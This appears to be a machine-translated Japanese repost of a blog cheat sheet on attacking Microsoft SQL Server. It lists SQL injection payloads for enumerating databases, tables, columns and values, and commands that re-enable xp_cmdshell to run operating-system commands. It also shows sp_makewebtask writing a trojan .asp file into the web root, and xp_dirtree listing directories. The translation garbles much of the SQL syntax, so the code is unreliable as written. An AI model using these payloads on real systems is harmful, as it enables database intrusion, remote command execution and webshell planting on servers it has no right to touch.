MSSQLデータベースのセキュリティ

MSSQLデータベースのセキュリティ

1. MSSQL注入

1)キーシステムテーブルマスタ

master.dbo.sysdatabases
キーフィールド:名前:データベース名、DBID:ライブラリIDの
master.dbo.sysobjects
キーフィールド:名前:オブジェクトの名前、ID:オブジェクトID、UID:ターゲットユーザIDの所有者、ステータス:オブジェクトの状態、 XTYPE:オブジェクトタイプ
master.dbo.syscolumns
キーフィールド:名:フィールド名、ID:テーブルのID番号は、たcolid:フィールドIDを

2)。手動検査

そして、(sysobjectsにから選択*)が存在する : インジェクションポイントタイプのチェックを
決意権:SELECT IS_SRVROLEMEMBER(「システム管理者/ db_ownerロール/パブリック」)
情報収集:
と@@バージョン> 0 //データベース情報の
宣言は、int型//サポート解析を@dクエリに複数行の文の
(から選択数(1)と [sysobjectsに])> = 0 // サポートサブクエリ
とユーザー> 0 //現在のデータベース・ユーザー名を取得
し、1 =変換(int型、DB_NAME ())、 および1または=(選択DB_NAME())//現在のデータベース名
と1 =(@@サーバー名を選択) // ローカルサービス名
と1 =(選択HAS_DBACCESS(「マスター」))// ライブラリの読み込み許可するかどうかを判断する
フィールドでグループ名前を有する1 = 1-- //ルックアップテーブル名と列名によって基を有する
エラー注入によって順http://blog.nsfocus.net/mssql-order-by/クエリ方法
すべてのデータベース名照会する:1 =を( DBID = 1 master.dbo.sysdatabasesから名前を選択 ) -
クエリのすべてのテーブルの現在のデータベース:及び(から選択トップ1名名前によってXTYPE = 0x75ためのsysobjectsから(セレクト上位n名)名前DESCによるT順序が)= 0
と(選択COL_NAME(OBJECT_ID(クエリフィールド名 ' テーブルを名前「)、N))0 =
クエリフィールドの値を表1からフィールド名と(選択上面)> 0かつ(選択トップテーブルのフィールド名<>フィールド値1フィールド名1)> 0。
ユニオンSELECTクエリ注射
番号一致列:1 = 2組合全て選択 NULL、NULL、からヌルテーブル
データ型の不一致:1 = 2組合全て選択 「」、ヌルは、からヌルテーブルは
、すべてのデータベース名を照会:(選択名からmaster.dbo.sysdatabases DBID = 1)
すべてのテーブルのクエリデータベース:((から上位1名を選択名前DESCによるT順序XTYPE = 0x75ため名前のsysobjectsから選択上位n名))
クエリフィールド名:(選択COL_NAME( OBJECT_ID(「テーブル」)、n))を
クエリフィールド値:(表からトップ1フィールド名を選択)(選択トップ1フィールド名<>フィールド値1フィールド名テーブルから)

2. MSSQLは、格納されたインジェクション攻撃を延長しました

1)拡張ストレージをチェック

xp_cmdshellを:SELECT COUNT()master.dbo.sysobjectどこXTYPE = 'X'と名= 'xp_cmdshellをから。
xp_regread:SELECT COUNT(
)master.dbo.sysobjects名= 'xp_regread'から

2)拡張記憶装置の電源をオンにし

EXEC sp_configureの'show'advancedオプション'、1;
幹部のsp_configure reconfigurel。
EXEC sp_configureの'xp_cmdshellを'、1;
幹部のsp_configure再設定。

3)拡張されたストレージの復元

オリジナルのxp_cmdshellを削除:;幹部master..sp_dropextendedproc 'xp_cmdshellを'
作成xp_cmdshellを:;幹部master..sp_addextendprox xp_cmdshellを' xplog70.dll'

4)攻撃.sa権限下で保存拡張:

xp_cmdshellを実行するように拡張は、任意のコマンド:;幹部master..xp_cmdshell「にwhoami」//コマンドが実行
操作は、レジストリxp_regwriteとオープンサンドボックスモード:
sp_makewebtash書き込みワードを使用してトロイの木馬:;幹部sp_makewebtask「C:\のinetpub \ wwwrootに\ cimer .asp '; SELECT' evil.fileを「 -

攻撃5).db_ownerの権限の下に保存された拡張:

ユーザー権限のデータベースを分析:1 =(選択IS_MEMBER( 'db_ownerの')); -
テーブルを作成します:;テーブルの一時(DIR NVARCHAR作成 (255)、深さはvarchar(255)、varchar型(255)ファイル、ID int型はありませんNULLのIDENTITY(1,1)); -
拡張されたクエリのxp_dirtreeを使用して:;温度への挿入(DIR、深さ、ファイル)のexec master.dbo.xp_dirtree 'C:'、1,1--
のルックアップテーブルの内容:と(ID = TEMPからDIRを選択 > 1)0

おすすめ

転載: www.cnblogs.com/TAiiiHu/p/12319318.html